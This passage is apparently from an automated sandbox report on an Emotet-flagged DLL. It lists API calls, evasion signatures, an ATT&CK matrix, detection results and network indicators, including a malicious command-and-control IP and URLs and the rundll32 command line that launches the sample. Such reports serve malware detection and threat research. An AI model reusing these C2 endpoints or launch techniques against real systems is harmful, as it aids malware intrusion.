                      Source: svchost.exe, 00000008.00000002.780129790.000001A1BF22A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`b
                      Source: svchost.exe, 00000014.00000002.828878679.00000280A8088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(@
                      Source: svchost.exe, 00000008.00000002.780383902.000001A1C4A63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                      Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828796250.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501793764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.780368082.000001A1C4A4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.829009677.00000280A80ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000A.00000002.828725718.000002830B402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000014.00000002.828872295.00000280A8082000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp`
                      Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP~
                      Source: svchost.exe, 0000000A.00000002.828769088.000002830B428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA526A20E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A7BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,3_2_00007FFA526A7BE8
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AD318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFA526AD318
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA526A20E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A6550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA526A6550

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,3_2_00007FFA526ADF20
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,3_2_00007FFA526AC6E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,3_2_00007FFA526AC39C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,3_2_00007FFA526ADF98
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,3_2_00007FFA526ADF3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,3_2_00007FFA526AC834
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,3_2_00007FFA526AC7F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,3_2_00007FFA526AC450
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,3_2_00007FFA526AC934
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,3_2_00007FFA526AC8C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_00007FFA526AC16C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,3_2_00007FFA526AE1E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,3_2_00007FFA526AC2B4
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A4558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00007FFA526A4558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AE6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_00007FFA526AE6C0

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 4.2.rundll32.exe.230423c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.28dc9d20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.28dc9d20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1050000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.f30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1050000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.f30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.230423c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.828897000.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.443771907.0000000001050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.447104613.00000230423C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.444094574.0000028DC9D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.446272102.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Native API                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		2
                      Masquerading                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium11
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		3
                      Virtualization/Sandbox Evasion                      		LSASS Memory31
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                      Process Injection                      		Security Account Manager3
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Hidden Files and Directories                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information                      		LSA Secrets1
                      Remote System Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Regsvr32                      		Cached Domain Credentials2
                      File and Directory Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Rundll32                      		DCSync34
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      File Deletion                      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626492 Sample: 2V7zjcga5L.dll Startdate: 14/05/2022 Architecture: WINDOWS Score: 76 39 Antivirus detection for URL or domain 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected Emotet 2->43 8 loaddll64.exe 1 2->8         started        10 svchost.exe 9 1 2->10         started        13 svchost.exe 2->13         started        15 4 other processes 2->15 process3 dnsIp4 17 cmd.exe 1 8->17         started        19 rundll32.exe 2 8->19         started        22 regsvr32.exe 2 8->22         started        24 rundll32.exe 8->24         started        33 127.0.0.1 unknown unknown 10->33 35 192.168.2.1 unknown unknown 13->35 process5 signatures6 26 rundll32.exe 2 17->26         started        45 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->45 process7 signatures8 47 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->47 29 regsvr32.exe 26->29         started        process9 dnsIp10 37 23.239.0.12, 443, 49754 LINODE-APLinodeLLCUS United States 29->37 49 System process connects to network (likely due to code injection or exploit) 29->49 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      2V7zjcga5L.dll33%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.rundll32.exe.28dc9d20000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      4.2.rundll32.exe.230423c0000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      7.2.regsvr32.exe.f30000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.regsvr32.exe.1050000.0.unpack100%AviraHEUR/AGEN.1215493Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://23.239.0.12/S9100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://23.239.0.12/0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://23.239.0.12/w9100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/S9regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://23.239.0.12/s9regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.hotspotshield.com/terms/svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.pango.co/privacysvchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://disneyplus.com/legal.svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.ver)svchost.exe, 00000008.00000002.780383902.000001A1C4A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.829009677.00000280A80ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000014.00000003.822548470.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.822494594.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.822517778.00000280A8B79000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://help.disneyplus.com.svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://23.239.0.12/w9regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://support.hotspotshield.com/svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            23.239.0.12
                            		unknownUnited States
                            		63949LINODE-APLinodeLLCUStrue

                            Private

                            IP
                            192.168.2.1
                            127.0.0.1

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:626492
                            Start date and time: 14/05/202205:00:362022-05-14 05:00:36 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 18s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:2V7zjcga5L.dll
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:22
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal76.troj.evad.winDLL@19/5@0/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 40
                            • Number of non-executed functions: 196
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Adjust boot time
                            • Enable AMSI
                            • Sleeps bigger than 120000ms are automatically reduced to 1000ms

                            Warnings

                            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            05:02:18API Interceptor1x Sleep call for process: svchost.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            23.239.0.12vur7t4SumQ.dllGet hashmaliciousBrowse
                              3j6e3XaMWM.dllGet hashmaliciousBrowse
                                wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                  r0hiaXHscs.dllGet hashmaliciousBrowse
                                    TSvDnT6fkE.dllGet hashmaliciousBrowse
                                      Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                        2V7zjcga5L.dllGet hashmaliciousBrowse
                                          RuqTBW6t32.dllGet hashmaliciousBrowse
                                            yj81rxDZIp.dllGet hashmaliciousBrowse
                                              3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                  r0hiaXHscs.dllGet hashmaliciousBrowse
                                                    TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                      x4ByCNJqst.dllGet hashmaliciousBrowse
                                                        Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                          RuqTBW6t32.dllGet hashmaliciousBrowse
                                                            yj81rxDZIp.dllGet hashmaliciousBrowse
                                                              x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                lc4KFeS296.dllGet hashmaliciousBrowse
                                                                  36yjawe0S4.dllGet hashmaliciousBrowse

                                                                    Domains

                                                                    No context

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    LINODE-APLinodeLLCUSvur7t4SumQ.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    lc4KFeS296.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    36yjawe0S4.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    51c64c77e60f3980eea90869b68c58a8vur7t4SumQ.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    lc4KFeS296.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12
                                                                    36yjawe0S4.dllGet hashmaliciousBrowse
                                                                    • 23.239.0.12

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                    Download File
